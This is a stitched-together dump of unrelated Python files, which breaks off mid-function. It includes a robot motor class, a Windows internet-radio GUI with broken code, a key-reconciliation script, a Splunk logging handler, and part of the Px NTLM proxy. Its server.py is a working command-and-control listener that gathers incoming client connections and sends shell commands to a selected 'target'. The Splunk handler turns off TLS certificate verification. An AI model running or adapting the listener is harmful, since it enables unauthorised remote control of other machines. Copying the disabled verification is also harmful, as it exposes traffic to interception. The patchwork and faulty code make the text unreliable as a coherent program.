p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
if not (args.single_process or args.debug):
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
MoveRobot.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# author: Rami Chaari
from Motor import Motor
from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor
import threading
from multiprocessing import Process, current_process
class MoveRobot:
angle = 0
distance = 0
MotorLeft = Motor(200,1) #spr,port
MotorRight = Motor(200,2) #spr,port
stepsLeftMotor = 0
stepsRightMotor = 0
def drive(self, distance):
print("Robot driving")
process1 = Process(target = self.MotorLeft.drive, args=(distance,))
process1.start()
process2 = Process(target = self.MotorRight.drive, args=(distance,))
process2.start()
#self.stepsLeftMotor = self.MotorLeft.getSteps
#self.stepsRightMotor = self.MotorRight.getSteps
def turn(self, angle):
#Steps per revolution = 360 / step angle; our base step angle = 1.8
print("turning")
#1 revolution = 98 steps = 360 degrees
steps = angle*98/360
self.MotorLeft.drive(steps)
self.stepsLeftMotor = self.stepsLeftMotor + steps
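# Worked example for the conversion above: with 98 steps per full revolution,
# steps = angle * 98 / 360, so turn(90) issues 90 * 98 / 360 = 24.5 steps and
# turn(180) issues 49 steps. Whether fractional steps are usable depends on the
# Motor.drive implementation.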
def setSpeed(self, rpm):
self.MotorLeft.setSpeed(rpm)
self.MotorRight.setSpeed(rpm)
print("Speed is set")
def getStepsLeftMotor(self):
return self.stepsLeftMotor
def getStepsRightMotor(self):
return self.stepsRightMotor
def driveInSteps(self, steps):
print("Robot driving")
process1 = Process(target = self.MotorLeft.driveInSteps, args=(steps,))
process1.start()
process2 = Process(target = self.MotorRight.driveInSteps, args=(steps,))
process2.start()
def driveInStepsLeftMotor(self,steps):
self.MotorLeft.driveInSteps(steps)
def driveInStepsRightMotor(self,steps):
self.MotorRight.driveInSteps(steps)
|
RADIO REC NEW VERSION and NEW next FRONTEND 3.py
|
import sys, time, threading
# pip install python-vlc
import vlc
from guiradio import *
from time import strftime
from tkinter import filedialog
import pygame
import tkinter.font as TkFont
#import mp3play
from pygame import mixer
import imageio
from PIL import Image, ImageTk
from PyQt5 import QtCore, QtGui, QtWidgets
import webbrowser
import win32com.client as mouth
import wx
voice = mouth.Dispatch("SAPI.SpVoice")
word_to_say = " welcome Vladimir your online DJ radio and ,your real time,and date is",strftime('%H:%M:%S - %d.%m.%Y')
voice.Speak(word_to_say)
canals=[]
songflag=0
def thread(my_func):
def wrapper(*args, **kwargs):
my_thread = threading.Thread(target=my_func, args=args, kwargs=kwargs)
my_thread.start()
return wrapper
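# Usage sketch for the @thread decorator (illustrative; `tick` is a hypothetical
# function): the decorated call starts a background Thread and returns immediately,
# while the wrapped function keeps running on that thread.
#   @thread
#   def tick(n):
#       for i in range(n):
#           time.sleep(1)
#           print("tick", i)
#   tick(3)  # returns at once; printing continues in the background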
@thread
def playradio(canal):
#import win32com.client as mouth
#voice = mouth.Dispatch("SAPI.SpVoice")
#word_to_say = " play station"# time is,strftime('%H:%M:%S')
#voice.Speak(word_to_say)
global songflag
songflag=1
ppp = vlc.MediaPlayer(canal)
ppp.play()
while songflag==1:
time.sleep(0.7)
ppp.stop()
class MyWin(QtWidgets.QMainWindow):
def __init__(self, parent=None):
global canals
QtWidgets.QWidget.__init__(self, parent)
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
f=open('My radio online.txt','r',encoding='UTF-8')
for x in f:
mas=x.split('|')
name=mas[0]
self.ui.listView.addItem(name)
canal=mas[0]
canals.append(x)
self.ui.pushButton_5.clicked.connect(self.openPlayList)
self.ui.pushButton_3.clicked.connect(self.help)
self.ui.pushButton.clicked.connect(self.PlayMusic)
self.ui.pushButton_2.clicked.connect(self.StopMusic)
self.ui.listView.currentTextChanged.connect(self.PlayMusic)
def openPlayList(self):
import subprocess as sp
programName = "notepad.exe"
#This is the name of the txt file
#This is the radio stream list ----"My radio online.txt"---- example entry for testing: 1.Kiss radio Los-Angeles-usa.|http://stream.revma.ihrhls.com/zc185
fileName = "My radio online.txt"
sp.Popen([programName, fileName])
#----------------------------------------
#import subprocess as sp
programName = "sndvol.exe"
fileName = "sndvol.exe"
sp.Popen([programName, fileName])
#----------------------------------------
def help(self):
webbrowser.open("https://forum.lugasat.org.ua/viewtopic.php?t=965")
webbrowser.open (" https://www.aimp.ru/forum/index.php?topic=22023.6675")
def PlayMusic(self):
global songflag
songflag=0
time.sleep(1)
name=self.ui.listView.currentItem().text()
for x in canals:
if name in x:
mas=x.split('|')
canal=mas[1].strip()
print(name)
playradio(canal)
def StopMusic(self):
global songflag
songflag=0
time.sleep(1)
def set_volume(v):
global vol
global player
#either get the new volume from given argument v (type: str):
value = int(v)
#or get it directly from Scale widget (type: int)
value = vol.get()
player.audio_set_volume(value)
vol = Scale(..., command=set_volume)
def show_value(self):
global player
i = vol.get()
player.audio_set_volume(i)
vol = Scale(root,from_ = 0,to = 100,orient = HORIZONTAL ,resolution = 1)
vol.place(x=75, y = 300)
vol.set(50)
#song = ""
def closeEvent(self,event):
import win32com.client as mouth
voice = mouth.Dispatch("SAPI.SpVoice")
word_to_say = '''Goodbye, thank you for listening to online
radio stations well If you want to add a new radio station or
replace the old one you need to add to the folder of the text
document python the
link address of the online radio stream I hope our information helped'''
voice.Speak(word_to_say)
StopMusic()
event.accept()
instance = vlc.Instance()
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("Main Radio")
MainWindow.resize(298, 411)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.pushButton_5 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_5.setGeometry(QtCore.QRect(158, 338, 121, 53))
self.pushButton_5.setObjectName("pushButton")
self.pushButton_5.setStyleSheet("QPushButton"
"{"
"background-color :yellow;"
"}"
"QPushButton::pressed"
"{"
"background-color : lightgreen;"
"}"
)
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setGeometry(QtCore.QRect(18, 338, 121,53))
self.pushButton_3.setObjectName("pushButton")
self.pushButton_3.setStyleSheet("QPushButton"
"{"
"background-color : dodgerblue ;"
"}"
"QPushButton::pressed"
"{"
"background-color : lightgreen;"
"}"
)
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(18, 20, 122, 53))
self.pushButton.setObjectName("pushButton")
self.pushButton.setStyleSheet("QPushButton"
"{"
"background-color : seagreen;"
"}"
"QPushButton::pressed"
"{"
"background-color : lightgreen;"
"}"
)
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_2.setGeometry(QtCore.QRect(157, 20, 122, 53))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_2.setStyleSheet("QPushButton"
"{"
"background-color :indianred ;"
"}"
"QPushButton::pressed"
"{"
"background-color : red;"
"}"
)
self.listView = QtWidgets.QListWidget(self.centralwidget)
self.listView.setGeometry(QtCore.QRect(18, 80, 261, 250))
self.listView.setObjectName("listView")
self.listView.setStyleSheet("background-color: lightseagreen; border: 1px solid royalblue; border: 1px solid springgreen; color: lightgreen;")
MainWindow.setCentralWidget(self.centralwidget)
# creating a label widget
#
# setting up background color
#self.pushButton_5.setStyleSheet("background-color: royalblue; border: 1px solid gray;")
# creating a label widget
# setting up background color and border
#self.pushButton_3.setStyleSheet("background-color: yellow; border: 1px solid roylblue;")
# show all the widgets
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow","MainWindow"))
self.pushButton.setText(_translate("MainWindow","PLAY\n►\nRadio"))
self.pushButton_2.setText(_translate("MainWindow","STOP\n⬛\nRadio"))
self.pushButton_3.setText(_translate("MainWindow","🔎 RADIO\n Stream"))
self.pushButton_5.setText(_translate("MainWindow","OPEN TXT\nList 📂"))
if __name__=="__main__":
app = QtWidgets.QApplication(sys.argv)
myapp = MyWin()
myapp.setWindowTitle('KRB<))DJ((>ONLINE RADIO STATIONS')
myapp.setStyleSheet("background-color: royalblue; border: 3px solid blue; border: 2px solid springgreen;")
myapp.setFixedSize(298, 411)
myapp.show()
sys.exit(app.exec_())
openPlayList()
help()
|
server.py
|
import socket
import sys
import threading
import time
from queue import Queue
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
all_connections = []
all_address = []
# Create a socket (connect to computer)
def create_socket():
try:
global host
global port
global s
host = ""
port = 9999
s = socket.socket()
except socket.error as msg:
print("Socket creation error: ", str(msg))
# Binding the socket and listening for connections
def bind_socket():
try:
global host
global port
global s
print("binding the port: " + str(port))
s.bind((host, port))
s.listen(5)
except socket.error as msg:
print("Socket binding error: ", str(msg) + '\n' + 'Retrying....')
bind_socket()
# Handling connections from multiple clients and saving them to a list
# closing previous connections when server.py file is restarted
def accepting_connections():
for c in all_connections:
c.close()
del all_connections[:]
del all_address[:]
while True:
try:
conn, address = s.accept()
s.setblocking(1) # prevents timeout
all_connections.append(conn)
all_address.append(address)
print("Connection has been established : " + address[0])
except:
print("Error accepting connections.")
# 2nd thread functions - 1) see all the clients 2) select a client 3) send commands to the connected client.
# Interactive prompt for sending commands
# turtle > list
# 0 friend-A Port
# 1 Friend-B Port
# turtle > select 1
# 192.168.0.1> dir
def start_turtle():
while True:
cmd = input('turtle> ')
if cmd == 'list':
list_connections()
elif 'select' in cmd:
conn = get_target(cmd)
if conn is not None:
send_target_commands(conn)
else:
print("Command not recognised.")
# Display all current active connections with the client
def list_connections():
results = ''
for i, conn in enumerate(all_connections):
try:
conn.send(str.encode(' '))
conn.recv(101480)
except:
del all_connections[i]
del all_address[i]
continue
results += str(i) + " " + str(all_address[i][0]) + " " + str(all_address[i][1]) + "\n"
print("---- Clients -----" + "\n" + results)
# selecting the target
def get_target(cmd):
try:
target = cmd.replace('select ', '') # target = id
target = int(target)
conn = all_connections[target]
print("You are now connected to :" + str(all_address[target][0]))
print(str(all_address[target][0]) + ">", end="")
# 192.168.0.4>
return conn
except:
print("Selection not valid")
def send_target_commands(conn):
while True:
try:
cmd = input()
if cmd == 'quit':
break
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_response = str(conn.recv(20480), 'utf-8')
print(client_response, end="")
except:
print("Error sending commands")
break
# Create worker threads
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
# Do next job that is in the queue and (handle connections, send commands)
def work():
while True:
x = queue.get()
if x == 1:
create_socket()
bind_socket()
accepting_connections()
if x == 2:
start_turtle()
queue.task_done()
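# Dispatch sketch: with JOB_NUMBER = [1, 2] and NUMBER_OF_THREADS = 2, one worker
# thread takes job 1 (create_socket -> bind_socket -> accepting_connections, which
# loops forever accepting clients) while the other takes job 2 (the interactive
# start_turtle() prompt), so accepting connections and sending commands run
# concurrently on separate daemon threads.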
def create_jobs():
for x in JOB_NUMBER:
queue.put(x)
queue.join()
create_workers()
create_jobs()
|
bob.py
|
__author__ = "mashed-potatoes"
from threading import Thread
from os import _exit
from modules.hamming import *
from modules.config import *
from modules.iohelper import update_file
from modules.sender import RemoteHost
from modules.http_server import NetIO
from modules.logger import Logger
from modules.qber import calc_ber
from pymitter import EventEmitter
ee = EventEmitter()
l = Logger()
server = NetIO(64296)
rh = RemoteHost(REMOTE_HOST, l)
iteration = 0
@ee.on("parity generated")
def on_parity_generated(sid):
l.ok()
rh.emit("send parity")
@ee.on("parity sent")
def on_parity_received(sid):
global LEN_NES
l.ok()
l.proc("Generating bad blocks")
hamming_correct(
BOB_KEY, PARITY, TEMP, BAD_BLOCKS, POWER, len_nes=LEN_NES // 11, drop_bad=True
)
l.ok()
update_file(TEMP, BOB_KEY)
l.proc("Shuffling key")
shuffle(BOB_KEY, TEMP, LEN_SHUFFLE, 0)
update_file(TEMP, BOB_KEY)
l.ok()
l.proc("Sending badblocks")
rh.send_file(BAD_BLOCKS)
l.ok()
LEN_NES = 0
l.proc("Wiping badblocks")
rh.emit("wipe badblocks", LEN_NES)
@ee.on("blocks wiped")
def on_blocks_wiped(sid):
l.ok()
rh.emit("shuffle key")
@ee.on("iteration ended")
def on_next_iteration(sid):
global iteration
if iteration == ITERATIONS:
l.info("Task finished!")
calc_ber(l)
l.proc("Terminating Alice")
rh.emit("exit")
l.ok()
_exit(0)
l.info(f"*** THE ITERATION {iteration + 1} of {ITERATIONS} ***")
calc_ber(l)
iteration += 1
rh.emit("generate parity")
@ee.on("message")
def message(args):
global iteration
if 'Hello' in args:
l.info(f"Connected to Alice")
l.proc("Generating parity")
rh.emit("generate parity")
iteration += 1
def recover_keys():
import subprocess
subprocess.call(["bash", "recover_keys.sh"])
l.info("Keys recovered")
def run():
global server
l.info("Running Bob...")
# Debug only
recover_keys()
server.set_emitter(ee)
Thread(target=server.start).start()
|
splunk_hec_logging_handler.py
|
from __future__ import absolute_import
import json
import logging
import os
import threading
import time
import datetime
import socket
import traceback
import platform
import commands
import atexit
from requests_futures import sessions
def setInterval(interval):
def decorator(function):
def wrapper(*args, **kwargs):
stopped = threading.Event()
def loop(): # executed in another thread
while True:
if stopped.is_set():
return
else:
function(*args, **kwargs)
time.sleep(interval)
t = threading.Thread(target=loop)
t.daemon = True
t.start()
return stopped
return wrapper
return decorator
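# Usage sketch for setInterval (illustrative; `heartbeat` is a hypothetical function):
# the decorated function is re-run every `interval` seconds on a daemon thread, and
# calling it returns a threading.Event that stops the loop once set.
#   @setInterval(5)
#   def heartbeat():
#       print("still alive")
#   stopper = heartbeat()  # starts the periodic loop, returns immediately
#   stopper.set()          # later: stops the loop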
class SplunkHECHandler(logging.Handler):
def __init__(self, targetserver, hec_token, eventgen_name=None):
self._name = 'eventgen_splunk_hec_logger'
self.targetserver = targetserver
self.hec_token = hec_token
self.host = socket.gethostname()
self.pid = os.getpid()
self.events = []
self.send = True
self.os = platform.platform()
self.system_username = commands.getoutput('whoami')
self.eventgen_name = eventgen_name
atexit.register(self._stopFlushTimer)
self.log = logging.getLogger(self._name)
self.log.setLevel(logging.DEBUG)
self.log.info("SplunkHECHandler logger is initialized")
try:
self.ip = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in[socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
except:
self.ip = "unknown"
self.session = sessions.FuturesSession(max_workers=32)
if not targetserver or not hec_token:
self.log.warn("Please provide valid targetserver and hec_token in default/eventgen_engine.conf.")
self.send = False
super(SplunkHECHandler, self).__init__()
self.timer = self._flushAndRepeatTimer()
@setInterval(1)
def _flushAndRepeatTimer(self):
if self.send:
self.flush()
def _stopFlushTimer(self):
if self.send:
self.send = False
self.flush()
self.timer.set()
def _getEndpoint(self):
targeturi = "{0}/services/collector/event".format(self.targetserver)
return targeturi
def _getTraceback(self, record):
if record.exc_info:
return traceback.format_exc()
return None
def _getPayload(self, record):
payload = {
'event': {
'log': record.name,
'level': logging.getLevelName(record.levelno),
'message': record.getMessage(),
'local_time': str(datetime.datetime.now()),
'ip': self.ip,
'os': self.os,
'system_username': self.system_username,
'eventgen_name': self.eventgen_name
},
'time': time.time(),
'index': 'eventgen',
'source': 'eventgen',
'sourcetype': 'eventgen6',
'host': self.host,
}
tb = self._getTraceback(record)
if tb:
payload['traceback'] = tb
return json.dumps(payload)
def _sendHTTPEvents(self, current_batch):
currentreadsize = 0
stringpayload = ""
totalbytesexpected = 0
totalbytessent = 0
for line in current_batch:
targetline = str(line)
targetlinesize = len(targetline)
totalbytesexpected += targetlinesize
if (int(currentreadsize) + int(targetlinesize)) <= 10000: #10000 is the default max size of HEC sessions
stringpayload = stringpayload + targetline
currentreadsize = currentreadsize + targetlinesize
else:
try:
self._transmitEvents(stringpayload)
totalbytessent += len(stringpayload)
currentreadsize = 0
stringpayload = targetline
except Exception as e:
raise e
else:
try:
totalbytessent += len(stringpayload)
self._transmitEvents(stringpayload)
except Exception as e:
raise e
def _transmitEvents(self, data):
# Sending events every 10 seconds
try:
self.session.post(self._getEndpoint(),
data=data,
headers={'Authorization': 'Splunk {0}'.format(self.hec_token), 'content-type': 'application/json'},
verify=False)
time.sleep(10)
except Exception as e:
self.log.exception(e)
raise e
def flush(self):
self.log.debug('Flush Running. Num of events: {}.'.format(len(self.events)))
events = self.events
self.events = []
if self.send:
self._sendHTTPEvents(events)
def emit(self, record):
"""
Override emit() method in handler parent for sending log to RESTful API
"""
pid = os.getpid()
if pid != self.pid:
self.pid = pid
self.events = []
self.timer = self._flushAndRepeatTimer()
atexit.register(self._stopFlushTimer)
if record.name.startswith('requests') or record.name in ['urllib3.connectionpool']:
return
self.events.append(self._getPayload(record))
|
px.py
|
"Px is an HTTP proxy server to automatically authenticate through an NTLM proxy"
"Me Test on GitHub"
from __future__ import print_function
__version__ = "0.4.0"
import base64
import ctypes
import ctypes.wintypes
import multiprocessing
import os
import select
import signal
import socket
import sys
import threading
import time
import traceback
# Print if possible
def pprint(*objs):
try:
print(*objs)
except:
pass
# Dependencies
try:
import concurrent.futures
except ImportError:
pprint("Requires module futures")
sys.exit()
try:
import netaddr
except ImportError:
pprint("Requires module netaddr")
sys.exit()
try:
import psutil
except ImportError:
pprint("Requires module psutil")
sys.exit()
try:
import pywintypes
import sspi
except ImportError:
pprint("Requires module pywin32")
sys.exit()
try:
import winkerberos
except ImportError:
pprint("Requires module winkerberos")
sys.exit()
try:
import ntlm_auth.ntlm
except ImportError:
pprint("Requires module ntlm-auth")
sys.exit()
try:
import keyring
import keyring.backends.Windows
keyring.set_keyring(keyring.backends.Windows.WinVaultKeyring())
except ImportError:
pprint("Requires module keyring")
sys.exit()
# Python 2.x vs 3.x support
try:
import configparser
import http.server as httpserver
import socketserver
import urllib.parse as urlparse
import winreg
except ImportError:
import ConfigParser as configparser
import SimpleHTTPServer as httpserver
import SocketServer as socketserver
import urlparse
import _winreg as winreg
os.getppid = psutil.Process().ppid
PermissionError = WindowsError
HELP = """Px v%s
An HTTP proxy server to automatically authenticate through an NTLM proxy
Usage:
px [FLAGS]
python px.py [FLAGS]
Actions:
--save
Save configuration to px.ini or file specified with --config
Allows setting up Px config directly from command line
Values specified on CLI override any values in existing config file
Values not specified on CLI or config file are set to defaults
--install
Add Px to the Windows registry to run on startup
--uninstall
Remove Px from the Windows registry
--quit
Quit a running instance of Px.exe
Configuration:
--config=
Specify config file. Valid file path, default: px.ini in working directory
--proxy= --server= proxy:server= in INI file
NTLM server(s) to connect through. IP:port, hostname:port
Multiple proxies can be specified comma separated. Px will iterate through
and use the one that works. Required field unless --noproxy is defined. If
remote server is not in noproxy list and proxy is undefined, Px will reject
the request
--listen= proxy:listen=
IP interface to listen on. Valid IP address, default: 127.0.0.1
--port= proxy:port=
Port to run this proxy. Valid port number, default: 3128
--gateway proxy:gateway=
Allow remote machines to use proxy. 0 or 1, default: 0
Overrides 'listen' and binds to all interfaces
--hostonly proxy:hostonly=
Allow only local interfaces to use proxy. 0 or 1, default: 0
Px allows all IP addresses assigned to local interfaces to use the service.
This allows local apps as well as VM or container apps to use Px when in a
NAT config. Px does this by listening on all interfaces and overriding the
allow list.
--allow= proxy:allow=
Allow connection from specific subnets. Comma separated, default: *.*.*.*
Whitelist which IPs can use the proxy. --hostonly overrides any definitions
unless --gateway mode is also specified
127.0.0.1 - specific ip
192.168.0.* - wildcards
192.168.0.1-192.168.0.255 - ranges
192.168.0.1/24 - CIDR
--noproxy= proxy:noproxy=
Direct connect to specific subnets like a regular proxy. Comma separated
Skip the NTLM proxy for connections to these subnets
127.0.0.1 - specific ip
192.168.0.* - wildcards
192.168.0.1-192.168.0.255 - ranges
192.168.0.1/24 - CIDR
--useragent= proxy:useragent=
Override or send User-Agent header on client's behalf
--username= proxy:username=
Authentication to use when SSPI is unavailable. Format is domain\\username
Service name "Px" and this username are used to retrieve the password using
Python keyring. Px only retrieves credentials and storage should be done
directly in the keyring backend.
On Windows, Credential Manager is the backend and can be accessed from
Control Panel > User Accounts > Credential Manager > Windows Credentials.
Create a generic credential with Px as the network address, this username
and corresponding password.
--workers= settings:workers=
Number of parallel workers (processes). Valid integer, default: 2
--threads= settings:threads=
Number of parallel threads per worker (process). Valid integer, default: 5
--idle= settings:idle=
Idle timeout in seconds for HTTP connect sessions. Valid integer, default: 30
--socktimeout= settings:socktimeout=
Timeout in seconds for connections before giving up. Valid float, default: 20
--proxyreload= settings:proxyreload=
Time interval in seconds before refreshing proxy info. Valid int, default: 60
Proxy info reloaded from a PAC file found via WPAD or AutoConfig URL, or
manual proxy info defined in Internet Options
--foreground settings:foreground=
Run in foreground when frozen or with pythonw.exe. 0 or 1, default: 0
Px will attach to the console and write to it even though the prompt is
available for further commands. CTRL-C in the console will exit Px
--debug settings:log=
Enable debug logging. default: 0
Logs are written to working directory and over-written on startup
A log is automatically created if Px crashes for some reason
--uniqlog
Generate unique log file names
Prevents logs from being overwritten on subsequent runs. Also useful if
running multiple instances of Px""" % __version__
# Windows version
# 6.1 = Windows 7
# 6.2 = Windows 8
# 6.3 = Windows 8.1
# 10.0 = Windows 10
WIN_VERSION = float(str(sys.getwindowsversion().major) + "." + str(sys.getwindowsversion().minor))
# Proxy modes - source of proxy info
MODE_NONE = 0
MODE_CONFIG = 1
MODE_AUTO = 2
MODE_PAC = 3
MODE_MANUAL = 4
class State(object):
allow = netaddr.IPGlob("*.*.*.*")
config = None
domain = ""
exit = False
hostonly = False
logger = None
noproxy = netaddr.IPSet([])
noproxy_hosts = []
pac = ""
proxy_mode = MODE_NONE
proxy_refresh = None
proxy_server = []
proxy_type = {}
stdout = None
useragent = ""
username = ""
ini = "px.ini"
max_disconnect = 3
max_line = 65536 + 1
# Locks for thread synchronization;
# multiprocess sync isn't necessary because the State object is only shared by
# threads; every process has its own State object
proxy_type_lock = threading.Lock()
proxy_mode_lock = threading.Lock()
class Response(object):
__slots__ = ["code", "length", "headers", "data", "body", "chunked", "close"]
def __init__(self, code=503):
self.code = code
self.length = 0
self.headers = []
self.data = None
self.body = False
self.chunked = False
self.close = False
class Log(object):
def __init__(self, name, mode):
self.file = open(name, mode)
self.stdout = sys.stdout
self.stderr = sys.stderr
sys.stdout = self
sys.stderr = self
def close(self):
sys.stdout = self.stdout
sys.stderr = self.stderr
self.file.close()
def write(self, data):
try:
self.file.write(data)
except:
pass
if self.stdout is not None:
self.stdout.write(data)
self.flush()
def flush(self):
self.file.flush()
os.fsync(self.file.fileno())
if self.stdout is not None:
self.stdout.flush()
def dprint(msg):
if State.logger is not None:
# Do locking to avoid mixing the output of different threads as there are
# two calls to print which could otherwise interleave
sys.stdout.write(
multiprocessing.current_process().name + ": " +
threading.current_thread().name + ": " + str(int(time.time())) +
": " + sys._getframe(1).f_code.co_name + ": " + msg + "\n")
def dfile():
name = multiprocessing.current_process().name
if "--quit" in sys.argv:
name = "quit"
if "--uniqlog" in sys.argv:
name = "%s-%f" % (name, time.time())
logfile = os.path.join(os.path.dirname(get_script_path()), "debug-%s.log" % name)
return logfile
def reopen_stdout():
clrstr = "\r" + " " * 80 + "\r"
if State.logger is None:
State.stdout = sys.stdout
sys.stdout = open("CONOUT$", "w")
sys.stdout.write(clrstr)
else:
State.stdout = State.logger.stdout
State.logger.stdout = open("CONOUT$", "w")
State.logger.stdout.write(clrstr)
def restore_stdout():
if State.logger is None:
sys.stdout.close()
sys.stdout = State.stdout
else:
State.logger.stdout.close()
State.logger.stdout = State.stdout
###
# NTLM support
def b64decode(val):
try:
return base64.decodebytes(val.encode("utf-8"))
except AttributeError:
return base64.decodestring(val)
def b64encode(val):
try:
return base64.encodebytes(val.encode("utf-8"))
except AttributeError:
return base64.encodestring(val)
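# b64decode/b64encode are Python 2/3 shims: base64.decodebytes/encodebytes exist on
# Python 3 (and require bytes, hence the .encode("utf-8")), while Python 2 raises
# AttributeError for those names and falls back to decodestring/encodestring.
# Round-trip sketch on Python 3:
#   token = b64encode("user:pass").decode("utf-8").strip()   # 'dXNlcjpwYXNz'
#   assert b64decode(token) == b"user:pass"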
class NtlmMessageGenerator:
# take the proxy server as a parameter so that the one that actually connected is used (it does not need to be the first in the list)
def __init__(self, proxy_type, proxy_server_address):
pwd = ""
if State.username:
pwd = keyring.get_password("Px", State.domain + "\\" + State.username)
if proxy_type == "NTLM":
if not pwd:
self.ctx = sspi.ClientAuth("NTLM", os.environ.get("USERNAME"), scflags=0)
self.get_response = self.get_response_sspi
else:
self.ctx = ntlm_auth.ntlm.NtlmContext(State.username, pwd, State.domain, "", ntlm_compatibility=3)
self.get_response = self.get_response_ntlm
else:
principal = None
if pwd:
if State.domain:
principal = (urlparse.quote(State.username) + "@" +
urlparse.quote(State.domain) + ":" + urlparse.quote(pwd))
else:
principal = urlparse.quote(State.username) + ":" + urlparse.quote(pwd)
_, self.ctx = winkerberos.authGSSClientInit("HTTP@" + proxy_server_address,
principal=principal, gssflags=0, mech_oid=winkerberos.GSS_MECH_OID_SPNEGO)
self.get_response = self.get_response_wkb
def get_response_sspi(self, challenge=None):
dprint("pywin32 SSPI")
if challenge:
challenge = b64decode(challenge)
output_buffer = None
try:
error_msg, output_buffer = self.ctx.authorize(challenge)
except pywintypes.error:
traceback.print_exc(file=sys.stdout)
return None
response_msg = b64encode(output_buffer[0].Buffer)
response_msg = response_msg.decode("utf-8").replace('\012', '')
return response_msg
def get_response_wkb(self, challenge=""):
dprint("winkerberos SSPI")
try:
winkerberos.authGSSClientStep(self.ctx, challenge)
auth_req = winkerberos.authGSSClientResponse(self.ctx)
except winkerberos.GSSError:
traceback.print_exc(file=sys.stdout)
return None
return auth_req
def get_response_ntlm(self, challenge=""):
dprint("ntlm-auth")
if challenge:
challenge = b64decode(challenge)
response_msg = b64encode(self.ctx.step(challenge))
response_msg = response_msg.decode("utf-8").replace('\012', '')
return response_msg
###
# Proxy handler
class Proxy(httpserver.SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
# Contains the proxy servers responsible for the url this Proxy instance (aka thread) serves
proxy_servers = []
proxy_socket = None
def handle_one_request(self):
try:
httpserver.SimpleHTTPRequestHandler.handle_one_request(self)
except socket.error as e:
dprint("Socket error: %s" % e)
if not hasattr(self, "_host_disconnected"):
self._host_disconnected = 1
dprint("Host disconnected")
elif self._host_disconnected < State.max_disconnect:
self._host_disconnected += 1
dprint("Host disconnected: %d" % self._host_disconnected)
else:
dprint("Closed connection to avoid infinite loop")
self.close_connection = True
def address_string(self):
host, port = self.client_address[:2]
#return socket.getfqdn(host)
return host
def log_message(self, format, *args):
dprint(format % args)
def do_socket_connect(self, destination=None):
# Already connected?
if self.proxy_socket is not None:
return True
dests = list(self.proxy_servers) if destination is None else [destination]
for dest in dests:
dprint("New connection: " + str(dest))
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
proxy_socket.connect(dest)
self.proxy_address = dest
self.proxy_socket = proxy_socket
break
except Exception as e:
dprint("Connect failed: %s" % e)
# Move an unreachable proxy to the end of the proxy list;
if len(self.proxy_servers) > 1:
# append first and then remove; this should ensure thread safety with
# manually configured proxies (in this case self.proxy_servers references the
# shared State.proxy_server)
self.proxy_servers.append(dest)
self.proxy_servers.remove(dest)
if self.proxy_socket is not None:
return True
return False
def do_socket(self, xheaders={}, destination=None):
dprint("Entering")
# Connect to proxy or destination
if not self.do_socket_connect(destination):
return Response(408)
# No chit chat on SSL
if destination is not None and self.command == "CONNECT":
return Response(200)
cl = 0
chk = False
expect = False
keepalive = False
ua = False
cmdstr = "%s %s %s\r\n" % (self.command, self.path, self.request_version)
self.proxy_socket.sendall(cmdstr.encode("utf-8"))
dprint(cmdstr.strip())
for header in self.headers:
hlower = header.lower()
if hlower == "user-agent" and State.useragent != "":
ua = True
h = "%s: %s\r\n" % (header, State.useragent)
else:
h = "%s: %s\r\n" % (header, self.headers[header])
self.proxy_socket.sendall(h.encode("utf-8"))
dprint("Sending %s" % h.strip())
if hlower == "content-length":
cl = int(self.headers[header])
elif hlower == "expect" and self.headers[header].lower() == "100-continue":
expect = True
elif hlower == "proxy-connection":
keepalive = True
elif hlower == "transfer-encoding" and self.headers[header].lower() == "chunked":
dprint("CHUNKED data")
chk = True
if not keepalive and self.request_version.lower() == "http/1.0":
xheaders["Proxy-Connection"] = "keep-alive"
if not ua and State.useragent != "":
xheaders["User-Agent"] = State.useragent
for header in xheaders:
h = ("%s: %s\r\n" % (header, xheaders[header])).encode("utf-8")
self.proxy_socket.sendall(h)
if header.lower() != "proxy-authorization":
dprint("Sending extra %s" % h.strip())
else:
dprint("Sending extra %s: sanitized len(%d)" % (header, len(xheaders[header])))
self.proxy_socket.sendall(b"\r\n")
if self.command in ["POST", "PUT", "PATCH"]:
if not hasattr(self, "body"):
dprint("Getting body for POST/PUT/PATCH")
if cl:
self.body = self.rfile.read(cl)
else:
self.body = self.rfile.read()
dprint("Sending body for POST/PUT/PATCH: %d = %d" % (cl or -1, len(self.body)))
self.proxy_socket.sendall(self.body)
self.proxy_fp = self.proxy_socket.makefile("rb")
resp = Response()
if self.command != "HEAD":
resp.body = True
# Response code
for i in range(2):
dprint("Reading response code")
line = self.proxy_fp.readline(State.max_line)
if line == b"\r\n":
line = self.proxy_fp.readline(State.max_line)
try:
resp.code = int(line.split()[1])
except (ValueError, IndexError):
dprint("Bad response %s" % line)
if line == b"":
dprint("Client closed connection")
return Response(444)
if (b"connection established" in line.lower() or
resp.code == 204 or resp.code == 304):
resp.body = False
dprint("Response code: %d " % resp.code + str(resp.body))
# Get response again if 100-Continue
if not (expect and resp.code == 100):
